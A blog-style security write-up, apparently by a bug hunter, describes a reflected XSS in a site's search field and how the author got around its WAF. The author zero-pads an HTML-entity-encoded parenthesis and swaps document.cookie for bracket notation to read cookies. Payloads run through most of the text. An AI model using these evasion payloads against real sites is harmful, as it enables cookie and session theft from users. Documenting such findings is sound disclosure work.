XSS with 403 WAF Bypass for “(” and (document.cookie)

3 months ago 24


Hi!, in this article I want to share my finding about reflected XSS and some way for bypassing 403 Forbidden.

Firstly, what is XSS vulnerability?

XSS (Cross Site Scripting)
XSS (Cross Site Scripting)

XSS or Cross Site Scripting is web vulnerability in client-side where the attacker able to injects malisious code to the browser, usually via input form (like search and another field). Attacker can stealing victim cookies, data, or even the session so attacker can login as a victim without need authentication (worst case).

In my case, vulnerability occurs in search field. There’s no filter for user to input tag “<>” character, so it’s basically can filled by html or javascript code then it’s executed as html injection or javascript injection (XSS). But, even that, I got that some pattern or character was forbidden as it leads to 403 forbidden status.

My first payload is : testtest”+onmouseover%3D”alert(1) then it’s got blocked by WAF (403 forbidden)

Payload was blocked by WAF
Payload was blocked by WAF

Then, I try to analyze what is the letter/character/pattern actually blocked and forbids by WAF. So, I try it step by step :

testtest”+onmouseover → 200 ok

testtest”+onmouseover%3D → 200 ok

testtest”+onmouseover%3D”alert → 200 ok, and so on (This is one of my classic technique when trying bypassing :D )

Until I found the character that leads my payload got blocked, it’s “(” character when I try to close argument of alert parameter. It looks like :

testtest”+onmouseover%3D”alert(1) → 403 forbidden, blocked by WAF

but, testtest”+onmouseover%3D”alert1) → 200 ok, still fine :D

So, I try to bypass “(” character with HTML entities numeric by replacing “(” with &#40;

**NB : You can check HTML Entities for another characters in https://tools.w3cub.com/html-entities

testtest”+onmouseover%3D”alert&#40;1) → invalid payload because after “&” character the text will be ignored or removed

Then, try to encode &#40; with url encode :

testtest”+onmouseover%3D”alert%26%2340%3B1) → 403 forbidden, blocked by WAF

**You can use this site for url encoding : https://www.urlencoder.io/

Then, I remembered a write up that bypassing WAF for XSS with add “00” or “%00” in the middle of payload, so I try modify the payload again :

testtest”+onmouseover%3D”alert%26%230040%3B1) → still blocked

testtest”+onmouseover%3D”alert%26%230000000040%3B1) → 200 ok (Nice…)

Finally, I bypassed it after adding “0” 8 times (8x) like above payload.

modified payload was triggered
Modified payload was triggered. Note : In image, the payload looks different because it’s already processed by the site so some character was implemented, like %3D in url where I injected, but in search result and field it becomes “=”

Then, I try to access document cookie, but the text “document.cookie” of payload removed by site, it looks like there’s another security mechanism.

testtest”+onmouseover%3D”alert%26%230000000040%3Bdocument.cookie) → 200 ok, but…

it become to :

testtest” onmouseover=”alert&#0000000040;[removed])

So, I modified again the payload by changing document.cookie to document[‘cookie’]

testtest”+onmouseover%3D”alert%26%230000000040%3Bdocument[‘cookie’]) → 200 ok and payload was triggered

Modified payload with accessing document.cookie was triggered
Modified payload with accessing document.cookie was triggered

Thank you.

Read Entire Article